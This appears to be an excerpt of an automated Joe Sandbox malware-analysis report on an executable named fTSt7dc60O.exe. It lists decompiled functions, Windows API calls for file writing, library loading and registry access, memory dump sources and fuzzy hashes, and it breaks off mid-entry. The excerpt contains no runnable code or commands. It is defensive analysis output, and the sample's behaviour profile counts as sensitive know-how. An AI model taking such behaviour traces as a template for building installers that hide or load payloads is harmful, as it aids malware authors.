                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                      • Instruction ID: dca007468fed7c27dd914b546e5ea1ac9ab056a0c62ecf1bea7b7831388965f7
                                                      • Opcode Fuzzy Hash: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                      • Instruction Fuzzy Hash: 58A14471E00229DBDF28CFA8C8447ADBBB1FF48305F15816AD856BB281C7785A96CF44
                                                      Function 00406BD3 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                      • Instruction ID: e31ab10654d3133c4bbe562e0396aaf9f668a3464ceaf5ac7e335a669e1e1d03
                                                      • Opcode Fuzzy Hash: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                      • Instruction Fuzzy Hash: 8E912371E00228CBEF28CF98C8587ADBBB1FF44305F15816AD856BB291C7785A96DF44
                                                      Function 004068E9 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                      • Instruction ID: e0c60a541a5106e25e0a2f50f35f038ee2aa27f15edb78bccdd8f3c871378321
                                                      • Opcode Fuzzy Hash: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                      • Instruction Fuzzy Hash: 2C814471D04228DFDF24CFA8C8487ADBBB1FB45305F25816AD456BB281C7789A96CF44
                                                      Function 004063EE Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                      • Instruction ID: c1f18cc480c27d0a28c5d6dc1e8cd9b1e5e62e2ab7f78041d4dc85e199002e6a
                                                      • Opcode Fuzzy Hash: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                      • Instruction Fuzzy Hash: 9B816731D04228DBDF24CFA8C8487ADBBB1FB44305F25816AD856BB2C1C7785A96DF84
                                                      Function 0040683C Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                      • Instruction ID: 317a4f11872e46a6f39a96627fb546a7164eb21cb9e645d400dda74b69288846
                                                      • Opcode Fuzzy Hash: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                      • Instruction Fuzzy Hash: 48713471D04228DFEF24CFA8C8447ADBBB1FB48305F15816AD856BB281C7785A96DF44
                                                      Function 0040695A Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                      • Instruction ID: 7b464a411068ed62169f7738ff9b09ef3af2f2625e32a791141ed05019b82bd1
                                                      • Opcode Fuzzy Hash: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                      • Instruction Fuzzy Hash: A4714571E04228DFEF28CF98C8447ADBBB1FB48301F15816AD456BB281C7785996DF44
                                                      Function 004068A6 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                      • Instruction ID: 924b227091e8338000478ad755e115b80dfeef44851b3a3b0f99ac33e872c674
                                                      • Opcode Fuzzy Hash: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                      • Instruction Fuzzy Hash: 07713571E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                      Function 00403062 Relevance: 4.6, APIs: 3, Instructions: 95fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                      • WriteFile.KERNELBASE(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: File$PointerWrite
                                                      • String ID:
                                                      • API String ID: 539440098-0
                                                      • Opcode ID: 90118ecf7a9ba7c1b0c512c54543666c71b076bc3a218e086344a49311413f62
                                                      • Instruction ID: e0bff1d0cfda9ca41153e72f66d50dbc15cd376e58f7be5246e1248deba32b17
                                                      • Opcode Fuzzy Hash: 90118ecf7a9ba7c1b0c512c54543666c71b076bc3a218e086344a49311413f62
                                                      • Instruction Fuzzy Hash: A2315971504218EBDF20CF65ED45A9F3FB8EB08755F20807AF904EA1A0D3349E40DBA9
                                                      Function 00401F98 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FC3
                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                        • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                        • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll), ref: 0040525F
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                      • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                      • String ID:
                                                      • API String ID: 334405425-0
                                                      • Opcode ID: a8461a16ac82fd46328c3b40fe1928024aef525999e2dd49edf51c7c032d1790
                                                      • Instruction ID: 409458e37c45ac75b59f5eb787cb01d488d5b476e6d1706a1798d0305ac83909
                                                      • Opcode Fuzzy Hash: a8461a16ac82fd46328c3b40fe1928024aef525999e2dd49edf51c7c032d1790
                                                      • Instruction Fuzzy Hash: A221C571904215F6CF206FA5CE48ADEBAB4AB04358F70427BF610B51E0D7B98E41DA6E
                                                      Function 100028A4 Relevance: 3.2, APIs: 2, Instructions: 156COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetFilePointer.KERNELBASE(00000000), ref: 10002963
                                                      • GetLastError.KERNEL32 ref: 10002A6A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1384748730.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000000.00000002.1384465097.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000000.00000002.1385695895.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000000.00000002.1385764243.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_10000000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileLastPointer
                                                      • String ID:
                                                      • API String ID: 2976181284-0
                                                      • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                      • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                      • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                      • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                      Function 004023E0 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID:
                                                      • API String ID: 3677997916-0
                                                      • Opcode ID: c32cffa1c652d0f2c9f8b1d7d2b39189a889ceb323ad23ef5d1c5f54ddf36b6e
                                                      • Instruction ID: d7ada52d2c39296e820c3ca3910a3186400bd00b77f85fef4b18c2a42e671548
                                                      • Opcode Fuzzy Hash: c32cffa1c652d0f2c9f8b1d7d2b39189a889ceb323ad23ef5d1c5f54ddf36b6e
                                                      • Instruction Fuzzy Hash: 53115171915205EEDB14CFA0C6889AFB6B4EF40359F20843FE042A72D0D6B85A41DB5A
                                                      Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                                      • Instruction ID: 092ce593f34d4cefb17b57a654468e4a57f6b0d243feea45f1431905bdcf8400
                                                      • Opcode Fuzzy Hash: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                                      • Instruction Fuzzy Hash: 6F01F431B24210ABE7295B389C05B6A3698E710314F10863FF911F62F1DA78DC13CB4D
                                                      Function 004022D5 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F4
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004022FD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: CloseDeleteOpenValue
                                                      • String ID:
                                                      • API String ID: 849931509-0
                                                      • Opcode ID: 4bd72c51a3dc84892fe05f41f2106d015a2bbdeef4f8939a42ccf3008d047df4
                                                      • Instruction ID: 38b5be8bce117af921f4e5ecf87b48473febfbb911f594cd731ca38f4e60318c
                                                      • Opcode Fuzzy Hash: 4bd72c51a3dc84892fe05f41f2106d015a2bbdeef4f8939a42ccf3008d047df4
                                                      • Instruction Fuzzy Hash: 30F06272A04210ABEB15AFF59A4EBAE7278DB44318F20453BF201B71D1D5FC5D028A7D
                                                      Function 00401DC7 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Window$EnableShow
                                                      • String ID:
                                                      • API String ID: 1136574915-0
                                                      • Opcode ID: 0f4d8abf280261f43614518adab2bae4bd66ad472d4fa30d0b6c7b31f2cad2bd
                                                      • Instruction ID: 2c80559432ee8e8f64af81f0c0a70d483a1ba28b218ef0fe4a74e939514edfa0
                                                      • Opcode Fuzzy Hash: 0f4d8abf280261f43614518adab2bae4bd66ad472d4fa30d0b6c7b31f2cad2bd
                                                      • Instruction Fuzzy Hash: CEE08CB2B04104DBCB50AFF4AA889DD7378AB90369B20087BF402F10D1C2B86C009A3E
                                                      Function 00405BB4 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\fTSt7dc60O.exe,80000000,00000003), ref: 00405BB8
                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                      Memory Dump Source
